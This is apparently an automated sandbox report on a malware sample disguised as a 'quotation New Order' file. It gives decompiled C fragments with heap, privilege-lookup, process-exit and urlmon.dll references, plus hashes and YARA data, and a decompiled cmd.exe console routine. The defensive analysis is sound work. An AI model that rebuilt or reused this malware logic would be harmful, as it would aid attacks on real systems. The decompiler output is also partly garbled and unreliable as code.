C-Code - Quality: 79%

			E004188D6() {
				void* _t10;
				void* _t15;
				void* _t19;

				asm("in al, dx");
				_t7 =  *((intOrPtr*)(_t19 + 8));
				E004191D0(_t15,  *((intOrPtr*)(_t19 + 8)),  *((intOrPtr*)(_t19 + 8)) + 0xc70,  *((intOrPtr*)(_t7 + 0x10)), 0, 0x34);
				_t6 = _t19 + 0xc; // 0x413526
				_t10 = RtlAllocateHeap( *_t6,  *(_t19 + 0x10),  *(_t19 + 0x14)); // executed
				return _t10;
			}

0x004188a2
0x004188a3
0x004188b7
0x004188c2
0x004188cd
0x004188d1

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD

Strings

&5A, xrefs: 004188C2, 004188CC

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: 5b0c51a4670c36cf6b15078a112e731649a7056f00f82185188fbf973cad1b81
Instruction ID: 99ebfd1d1d235a582fe83273398da4cdb197152776bff5cb3a2ac6bbb9914d6f
Opcode Fuzzy Hash: 5b0c51a4670c36cf6b15078a112e731649a7056f00f82185188fbf973cad1b81
Instruction Fuzzy Hash: 50E012B1200214BBDB28EF59CC44EE737A8AF88354F158559FA0D9B281C631E951CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 004188A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				asm("in al, dx");
				_t7 = _a4;
				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_t7 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188a2
0x004188a3
0x004188b7
0x004188c2
0x004188cd
0x004188d1

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD

Strings

&5A, xrefs: 004188C2, 004188CC

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A31, Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00418A31(signed int __eax, signed int __ebx, int _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v117;
				void* __esi;
				void* _t32;
				void* _t33;
				intOrPtr* _t34;

				if((__eax & __ebx) >= 0) {
					_t20 = _a8;
					_t3 = _t20 + 0xc88; // 0xd8c
					_t34 = _t3;
					E004191D0(_t32, _a8, _t34,  *((intOrPtr*)(_t20 + 0xa14)), 0, 0x39);
					return  *((intOrPtr*)( *_t34))(_a12, _a16, _a20, _a24, _a28, _a32, _t33);
				} else {
					asm("popfd");
					asm("lodsd");
					asm("movsb");
					_v117 =  !_v117;
					__ebp = __esp;
					__eax = _a4;
					__esi = _a4 + 0xc8c;
					__eax = E004191D0(__edi, __eax, _a4 + 0xc8c,  *((intOrPtr*)(__eax + 0xa18)), 0, 0x46);
					__eax = _a12;
					__esp = __esp + 0x14;
					__eax = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}

0x00418a33
0x004189f3
0x00418a02
0x00418a02
0x00418a0a
0x00418a30
0x00418a35
0x00418a35
0x00418a36
0x00418a37
0x00418a3f
0x00418a41
0x00418a43
0x00418a52
0x00418a5a
0x00418a62
0x00418a68
0x00418a70
0x00418a72
0x00418a73
0x00418a74
0x00418a74

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 568e92e6e6d4aa4668a380e8f4248ab75006a282118a1fd2f7c7227e83814588
Instruction ID: 058d52aca4da3cc2efb055f812946ea2d9e559a4f51d5ad054069d3610fa782c
Opcode Fuzzy Hash: 568e92e6e6d4aa4668a380e8f4248ab75006a282118a1fd2f7c7227e83814588
Instruction Fuzzy Hash: 8C117CB6200108AFDB14DF49DC84EEB37A9EF89350F118159FE0D97241CA34E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A130( &_v67, 0, 0x3f);
				E0041AD10( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407280
0x0040728f
0x00407293
0x0040729e
0x004072ae
0x004072be
0x004072c3
0x004072ca
0x004072cd
0x004072da
0x004072dc
0x004072de
0x004072fb
0x004072fb
0x00000000
0x004072fd
0x00407302

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA

Uniqueness

Uniqueness Score: -1.00%

Function 004189E5, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 26%

			E004189E5(void* __eflags, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, struct _LUID* _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr* __esi;
				void* __ebp;
				int _t21;
				void* _t34;
				void* _t35;
				intOrPtr* _t37;
				void* _t39;

				if(__eflags <= 0) {
					_t21 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
					return _t21;
				} else {
					if(__eflags <= 0) {
						asm("aaa");
						_t23 = _a4;
						_t3 = _t23 + 0xc84; // 0x204738
						_t37 = _t3;
						E004191D0(_t34, _a4, _t37,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x38);
						return  *((intOrPtr*)( *_t37))(_a8, _a12, _a16, _t35, _t39);
					} else {
						asm("sbb al, 0xca");
						__ebp = __esp;
						__eax = _a4;
						_t9 = __eax + 0xc88; // 0xd8c
						__esi = _t9;
						E004191D0(__edi, _a4, __esi,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x39) = _a24;
						__eax = _a12;
						__eax =  *((intOrPtr*)( *__esi))(_a8, _a12, _a16, _a20, _a24, _a28, __esi, __ebp);
						_pop(__esi);
						_pop(__ebp);
						return _a12;
					}
				}
			}

0x004189ea
0x00418a70
0x00418a74
0x004189ec
0x004189ec
0x004189ad
0x004189b3
0x004189c2
0x004189c2
0x004189ca
0x004189e4
0x004189ee
0x004189ee
0x004189f1
0x004189f3
0x00418a02
0x00418a02
0x00418a12
0x00418a20
0x00418a2c
0x00418a2e
0x00418a2f
0x00418a30
0x00418a30
0x004189ec

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 575f7e8c3b5af65153076d678bf1937df3341dbf7cfd886c1f9a05be03011c3d
Instruction ID: 50c774ce0d26bf4333104c7d5201c24b523b5913b87fc28db93baa842383a420
Opcode Fuzzy Hash: 575f7e8c3b5af65153076d678bf1937df3341dbf7cfd886c1f9a05be03011c3d
Instruction Fuzzy Hash: 31F0A9B5200204ABCB14DF98DD40EEB33A8EF88310F04899AFC0C97302CA34E855CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00418914, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00418914(signed int __eax, void* __ecx, int _a4) {
				intOrPtr _v0;
				signed char _t6;

				asm("sbb ch, [ebx+edx*2+0x39]");
				_t6 = __eax & 0x0000003d;
				asm("daa");
				asm("in al, 0xa1");
				if(_t6 == 0) {
					__ebp = __esp;
					__eax = _v0;
					__ecx =  *((intOrPtr*)(__eax + 0xa14));
					_push(__esi);
					__esi = __eax + 0xc7c;
					__eax =  *__esi;
					ExitProcess(_a4);
				}
				asm("rcr byte [esi+0x5d], cl");
				return _t6;
			}

0x00418914
0x00418918
0x0041891b
0x0041891c
0x0041891e
0x00418921
0x00418923
0x00418926
0x0041892c
0x00418932
0x00418942
0x00418948
0x00418948
0x0041890e
0x00418911

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 8503170a7deff1fe2b215f607a899a455005e35c3504b6445a8cacc65f9357b7
Instruction ID: 08d5adb46bb769e8fefe484c7d5b0edbd0199922fae0f1cb3a20a6e3b61f99c1
Opcode Fuzzy Hash: 8503170a7deff1fe2b215f607a899a455005e35c3504b6445a8cacc65f9357b7
Instruction Fuzzy Hash: 88E0DF7022434877D7218B68CC9AED73BAC9F55790F048898FD482B242C435F901C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 004188E0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004188E0(void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t7 = _a4;
				_t3 = _t7 + 0xc74; // 0xc74
				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16);
				asm("rcr byte [esi+0x5d], cl");
				return _t10;
			}

0x004188e3
0x004188ef
0x004188f7
0x0041890d
0x0041890e
0x00418911

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A40, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418a5a
0x00418a70
0x00418a74

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418920, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418920(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418923
0x0041893a
0x00418948

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00415830, Relevance: 2.5, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00415830(void* __eax, void* __eflags) {
				intOrPtr* _t13;
				void* _t19;
				intOrPtr* _t25;
				void* _t29;

				if(__eflags != 0) {
					 *((intOrPtr*)(_t29 - 8)) = 0x203a;
					E0041A0B0();
					_t4 = _t29 - 0x24; // 0x6d6c7275
					_t25 = E00413E40( *((intOrPtr*)(_t29 + 8)) + 0xc94, E00409B30(__eflags,  *((intOrPtr*)(_t29 + 8)) + 0xc94, _t4), 0, 0, 0x69767207);
					__eflags = _t25;
					if(_t25 == 0) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						_t13 =  *_t25(0, E0041A380(_t19) + _t19, _t29 - 4);
						__eflags = _t13;
						if(_t13 != 0) {
							goto L5;
						} else {
							return 1;
						}
					}
				} else {
					return __eax;
				}
			}

0x00415833
0x0041588e
0x00415895
0x0041589d
0x004158bd
0x004158c2
0x004158c4
0x004158e9
0x004158ea
0x004158f0
0x004158c6
0x004158d8
0x004158da
0x004158dc
0x00000000
0x004158de
0x004158e8
0x004158e8
0x004158dc
0x00415835
0x0041583f
0x0041583f

Strings

urlmon.dll, xrefs: 0041589D, 004158A0
: , xrefs: 0041588E

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID:
String ID: : $urlmon.dll
API String ID: 0-3806925298
Opcode ID: 51e719b482a777b556e3c0d57bf361519db7c4c285a5fd4b527e2bad2ec8e51c
Instruction ID: 3ed2902dfe4635f92678bbeadb680b82901bbc9299fd3db9e5d4404ac1fe957b
Opcode Fuzzy Hash: 51e719b482a777b556e3c0d57bf361519db7c4c285a5fd4b527e2bad2ec8e51c
Instruction Fuzzy Hash: 25F08172E4111467E610BA81DC01FFEA738CF81328F040167FD0877240D25D9E9341EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C364, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e118dbc8c7156f81d68153acb7d582aba36dd53576dd771632b7dd773264e14
Instruction ID: b383f3ecba886acac5c983415ad0b5d50e698848f28731e4886dbbd033e7ac0a
Opcode Fuzzy Hash: 7e118dbc8c7156f81d68153acb7d582aba36dd53576dd771632b7dd773264e14
Instruction Fuzzy Hash: B2F0C072E0C480CBE311DE7C9440068F7B0FEA721075D13EACE9467195E6214421C2C5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmd.exe PID: 6500 Parent PID: 3352 cmd.exeCOMMON

Executed Functions

Non-executed Functions

Function 00DA3506, Relevance: 65.1, APIs: 30, Strings: 7, Instructions: 353
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 48%

			E00DA3506(void __ecx, signed int __edx, long _a4, DWORD* _a8) {
				signed int _v8;
				signed int _v16;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				unsigned int _v36;
				intOrPtr _v40;
				unsigned int _v44;
				intOrPtr _v50;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
				signed int _v68;
				void* _v76;
				void* _v80;
				DWORD* _v84;
				long _v88;
				void* _v90;
				signed int _v92;
				int _v96;
				void* _v100;
				long _v108;
				signed int _v112;
				void* _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t83;
				void* _t85;
				int _t86;
				int _t87;
				int _t93;
				signed int _t95;
				void* _t99;
				void* _t104;
				void* _t105;
				void _t106;
				void _t107;
				signed int _t108;
				void* _t118;
				void _t119;
				signed int _t133;
				signed int _t134;
				void* _t141;
				void* _t142;
				long _t143;
				void* _t147;
				signed char _t149;
				signed int _t152;
				void* _t156;
				signed int _t157;
				void* _t159;
				void* _t163;
				void* _t168;
				void* _t169;
				int _t170;
				void* _t177;
				void* _t178;
				void* _t181;
				void* _t182;
				void* _t184;
				void* _t185;
				DWORD* _t187;
				void* _t189;
				struct _COORD _t190;
				signed int _t191;
				signed int _t193;
				void* _t196;
				void* _t197;
				void* _t206;
				void* _t207;

				_t173 = __edx;
				_t193 = (_t191 & 0xfffffff8) - 0x54;
				_t83 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t83 ^ _t193;
				_t187 = _a8;
				_t184 = __edx;
				_v56.dwCursorPosition = __ecx;
				_v80 = _t187;
				_t85 = GetStdHandle(0xfffffff5);
				_v76 = _t85;
				if(_t85 == 0xffffffff) {
					__imp___get_osfhandle(1);
					_v76 = _t85;
				}
				if( *0xdc3cc9 == 0) {
					L66:
					__imp__AcquireSRWLockShared(0xdc7f20);
					_t86 = ReadConsoleW(_v56.dwSize, _t184, _a4, _t187, 0);
					__imp__ReleaseSRWLockShared(0xdc7f20);
					_t87 = _t86;
				} else {
					_t147 = 0x20;
					_t196 =  *0xdad0d8 - _t147; // 0x20
					if(_t196 >= 0) {
						goto L66;
					} else {
						_t197 =  *0xdad0d4 - _t147; // 0x20
						if(_t197 >= 0 || GetConsoleScreenBufferInfo(_t85,  &_v32) == 0) {
							goto L66;
						} else {
							_t149 =  *0xdad0d8; // 0x20
							_t190 = _v32.dwCursorPosition;
							_t142 = 0;
							_t173 = 1 << _t149;
							asm("bts edx, eax");
							_v68 = _t190;
							_v56.wAttributes = 0x10;
							_v56.dwSize = 0;
							_v44 = 0;
							_v40 = 1;
							_v36 = 0;
							E00DAB4DD( *0xdad0d4 & 0x0000ffff);
							 *0xdad580 = 0;
							 *0xdad578 = 0;
							 *0xdad574 = 0;
							 *0xdad57c = 0;
							while(1) {
								L7:
								__imp__AcquireSRWLockShared(0xdc7f20);
								_t93 = ReadConsoleW(_v56.dwSize, _t184, _a4, _v84,  &(_v56.dwCursorPosition));
								_v92 = _t93;
								__imp__ReleaseSRWLockShared(0xdc7f20);
								_v68 =  *_v88;
								if( *0xdad544 == 0) {
									_t95 = 0;
									__eflags = 0;
								} else {
									EnterCriticalSection( *0xdb3858);
									 *0xdad544 = 0;
									LeaveCriticalSection( *0xdb3858);
									if(_t142 != 0) {
										RtlFreeHeap(GetProcessHeap(), 0, _t142);
									}
									_t95 = 0;
									_t142 = 0;
								}
								if(_v96 == 0) {
									break;
								}
								_t173 = _t173 | 0xffffffff;
								_v92 = _v92 | 0xffffffff;
								_v80 = _t95;
								if( *_v88 <= 0) {
									break;
								} else {
									while(1) {
										_t152 =  *(_t184 + _t95 * 2) & 0x0000ffff;
										if(_t152 == 0xd) {
											break;
										}
										_t206 = _t152 -  *0xdad0d8; // 0x20
										if(_t206 == 0) {
											_v92 = _t95;
											goto L25;
										} else {
											_t207 = _t152 -  *0xdad0d4; // 0x20
											if(_t207 == 0) {
												_v92 = _t95;
												_v80 = 1;
												L24:
												__eflags = _t173 - 0xffffffff;
												if(_t173 != 0xffffffff) {
													goto L18;
												} else {
													L25:
													__eflags = _t95 - 0xffffffff;
													if(_t95 == 0xffffffff) {
														goto L18;
													} else {
														 *_v88 = _t95;
														 *(_t184 + _t95 * 2) = 0;
														__eflags = _t142;
														if(_t142 == 0) {
															L35:
															_v96 = 1;
														} else {
															_t169 = _t142;
															_t133 = _t184;
															while(1) {
																_t181 =  *_t133;
																__eflags = _t181 -  *_t169;
																if(_t181 !=  *_t169) {
																	break;
																}
																__eflags = _t181;
																if(_t181 == 0) {
																	L32:
																	_t170 = 0;
																	_t134 = 0;
																} else {
																	_t182 =  *((intOrPtr*)(_t133 + 2));
																	__eflags = _t182 -  *((intOrPtr*)(_t169 + 2));
																	if(_t182 !=  *((intOrPtr*)(_t169 + 2))) {
																		break;
																	} else {
																		_t133 = _t133 + 4;
																		_t169 = _t169 + 4;
																		__eflags = _t182;
																		if(_t182 != 0) {
																			continue;
																		} else {
																			goto L32;
																		}
																	}
																}
																L34:
																_v96 = _t170;
																__eflags = _t134;
																if(_t134 != 0) {
																	goto L35;
																}
																goto L36;
															}
															asm("sbb eax, eax");
															_t134 = _t133 | 0x00000001;
															_t170 = 0;
															__eflags = 0;
															goto L34;
														}
														L36:
														_t99 = _v80;
														__eflags = _t99;
														if(__eflags == 0) {
															__eflags = _v92 - 2;
															if(__eflags > 0) {
																__imp___wcsnicmp(_t184, L"cd ", 3);
																_t193 = _t193 + 0xc;
																__eflags = _t99;
																if(__eflags == 0) {
																	L45:
																	_t99 = 1;
																} else {
																	__imp___wcsnicmp(_t184, L"rd ", 3);
																	_t193 = _t193 + 0xc;
																	__eflags = _t99;
																	if(__eflags == 0) {
																		goto L45;
																	} else {
																		__imp___wcsnicmp(_t184, L"md ", 3);
																		_t193 = _t193 + 0xc;
																		__eflags = _t99;
																		if(__eflags == 0) {
																			goto L45;
																		} else {
																			__imp___wcsnicmp(_t184, L"chdir ", 6);
																			_t193 = _t193 + 0xc;
																			__eflags = _t99;
																			if(__eflags == 0) {
																				goto L45;
																			} else {
																				__imp___wcsnicmp(_t184, L"rmdir ", 6);
																				_t193 = _t193 + 0xc;
																				__eflags = _t99;
																				if(__eflags == 0) {
																					goto L45;
																				} else {
																					__imp___wcsnicmp(_t184, L"mkdir ", 6);
																					_t193 = _t193 + 0xc;
																					__eflags = _t99;
																					if(__eflags == 0) {
																						goto L45;
																					} else {
																						__imp___wcsnicmp(_t184, L"pushd ", 6);
																						_t193 = _t193 + 0xc;
																						__eflags = _t99;
																						if(__eflags != 0) {
																							_t99 = _v80;
																						} else {
																							goto L45;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
														_push(_v96);
														_t155 = _t184;
														_push(_t99);
														_push( !(_v44 >> 4) & 0x00000001);
														_push(_v92);
														_t104 = E00DAB2BF(_t142, _t184, _a4, _t184, _t190, __eflags);
														__eflags = _t104;
														if(_t104 == 0) {
															_t105 = E00D97797(_t155);
															__eflags = _t105;
															if(_t105 != 0) {
																 *0xdcc014(0xffffffff);
															}
															_t156 = _t184;
															_t73 = _t156 + 2; // 0xc
															_t177 = _t73;
															do {
																_t106 =  *_t156;
																_t156 = _t156 + 2;
																__eflags = _t106 - _v80;
															} while (_t106 != _v80);
															_t157 = _t156 - _t177;
															__eflags = _t157;
															_v68 = _t157 >> 1;
														} else {
															E00DA9897();
															_t118 = GetConsoleScreenBufferInfo(_v100,  &_v56);
															__eflags = _t118;
															if(_t118 != 0) {
																_t168 = _v50 - (_v92 + _v108) / _v56;
																__eflags = _t168;
																_v90 = _t168;
																_t190 = _v92;
															}
															_t163 = _t184;
															_t61 = _t163 + 2; // 0xc
															_t178 = _t61;
															do {
																_t119 =  *_t163;
																_t163 = _t163 + 2;
																__eflags = _t119 - _v80;
															} while (_t119 != _v80);
															_v88 = _t163 - _t178 >> 1;
															SetConsoleCursorPosition(_v100, _t190);
															_push( &_v84);
															_push(_t190);
															_push(_v84);
															_push(0x20);
															_push(_v100);
															FillConsoleOutputCharacterW();
															WriteConsoleW(_v120, _t184, _v108,  &_v108, 0);
															_v88 = _v108;
															E00D906C0(_t163 - _t178 >> 1);
														}
														__eflags = _t142;
														if(_t142 == 0) {
															_t143 = 0;
															__eflags = 0;
														} else {
															_t143 = 0;
															RtlFreeHeap(GetProcessHeap(), 0, _t142);
														}
														_t159 = _t184;
														_t76 = _t159 + 2; // 0xc
														_t173 = _t76;
														do {
															_t107 =  *_t159;
															_t159 = _t159 + 2;
															__eflags = _t107 - _t143;
														} while (_t107 != _t143);
														_t77 = (_t159 - _t173 >> 1) + 1; // 0x9
														_t108 = _t77;
														_v112 = _t108;
														_t142 = HeapAlloc(GetProcessHeap(), _t143, _t108 + _t108);
														__eflags = _t142;
														if(_t142 == 0) {
															_t87 = 0;
														} else {
															_t173 = _v112;
															E00D91040(_t142, _t173, _t184);
															goto L7;
														}
													}
												}
											} else {
												_t95 = _t95 + 1;
												if(_t95 <  *_v88) {
													continue;
												} else {
													goto L18;
												}
											}
										}
										goto L67;
									}
									_t173 = _t95;
									_t95 = _v92;
									goto L24;
								}
								goto L67;
							}
							L18:
							if(_t142 != 0) {
								RtlFreeHeap(GetProcessHeap(), 0, _t142);
							}
							_t87 = _v96;
						}
					}
				}
				L67:
				_pop(_t185);
				_pop(_t189);
				_pop(_t141);
				return E00D96FD0(_t87, _t141, _v16 ^ _t193, _t173, _t185, _t189);
			}

0x00da3506
0x00da350e
0x00da3511
0x00da3518
0x00da351e
0x00da3524
0x00da3526
0x00da352a
0x00da352e
0x00da3534
0x00da353b
0x00da353f
0x00da3546
0x00da3546
0x00da3551
0x00da3932
0x00da3938
0x00da3949
0x00da3952
0x00da3958
0x00da3557
0x00da3559
0x00da355a
0x00da3561
0x00000000
0x00da3567
0x00da3567
0x00da356e
0x00000000
0x00da3588
0x00da3588
0x00da3598
0x00da359c
0x00da359e
0x00da35a0
0x00da35a3
0x00da35a7
0x00da35af
0x00da35b3
0x00da35b7
0x00da35bb
0x00da35bf
0x00da35c4
0x00da35ca
0x00da35d0
0x00da35d6
0x00da35dc
0x00da35dc
0x00da35e1
0x00da35f8
0x00da3603
0x00da3607
